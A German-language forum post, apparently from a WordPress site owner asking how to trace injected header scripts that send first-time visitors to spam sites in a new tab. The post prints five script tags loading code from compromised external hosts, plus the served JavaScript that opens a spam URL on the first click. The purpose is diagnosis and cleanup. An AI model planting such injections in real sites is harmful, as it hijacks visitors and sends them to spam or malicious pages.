Eine Website, auf der WordPress ausgeführt wird, öffnet beim ersten Klick für neue Benutzer eine Spam-Website in einem neuen Tab. Wenn Sie direkt auf die URL gehen oder die Seite schon einmal besucht haben, wird die Malware nicht ausgelöst. Wenn Sie ein neuer Benutzer sind und beispielsweise von den Google-Suchergebnissen zu der Seite navigieren, werden Sie (über einen neuen Tab) auf eine zufällige Spam-Seite umgeleitet. URL scheint jedes Mal anders zu sein.
Bisher habe ich verschiedene Malware-Scanner (ua Sucuri und Wordfence) ohne Ergebnis ausprobiert. Ich habe versucht, alle Plugins zu deaktivieren, das Design zu ändern und WordPress zu aktualisieren. Habe versucht den Pre-Fetch zu deaktivieren. Malware noch vorhanden.
Ich habe herausgefunden, dass es fünf Skripte gibt, die irgendwie in den Header aufgenommen werden. Wenn ich mir die Quelle ansehe, wenn ich im Inkognito-Modus über die Google-Ergebnisse zur Website navigiere, kann ich die vorhandenen Verweise sehen. Im Header geladene Skripte:
<script type="text/javascript" src="https://longtailmagic.com/domain/i.php" id='hello_newscript0-js'></script>
<script type="text/javascript" src="https://jadsupport.com/includes/i.php" id='hello_newscript1-js'></script>
<script type="text/javascript" src="https://magaliefonteneau.com/wp-content/i.php" id='hello_newscript2-js'></script>
<script type="text/javascript" src="http://futuracp.com/images/i.php" id='hello_newscript3-js'></script>
<script type="text/javascript" src="http://casualwoodcreations.com/images/i.php" id='hello_newscript4-js'></script>
Alle fünf scheinen zufällige Seiten zu sein, auf denen WordPress ausgeführt wird und die dasselbe bösartige Skript bedienen. Wenn ich mir Ereignis-Listener anschaue, verstehe ich i.php:7 unter click.
Inspektion der i.php von einer der Seiten bedient, hat es Folgendes:
localStorage.setItem('test', 'testValue');
if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)){
var click_r = false;
document.addEventListener("click", function(){
if(click_r == false){
var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
document.cookie = "a=a; expires=" + date.toGMTString();
localStorage.setItem('click', 'click');
window.open("http://etbetrehyheartling.tk/index/?8131599557550");
click_r = true;
}
});
}
Gibt es eine Möglichkeit, die Quelle zu finden, aus der diese Skripteinbindungen generiert und dem Header hinzugefügt werden? Die Mission besteht darin, die Skriptreferenzen loszuwerden. Dies scheint der Weg zu sein, um die Malware abzuschütteln, die neue Benutzer auf eine Spam-Site umleitet. Ich habe String Locator mit verschiedenen Schlüsselwörtern ausprobiert, um näher an die Quelle heranzukommen, aber bisher kein Glück.
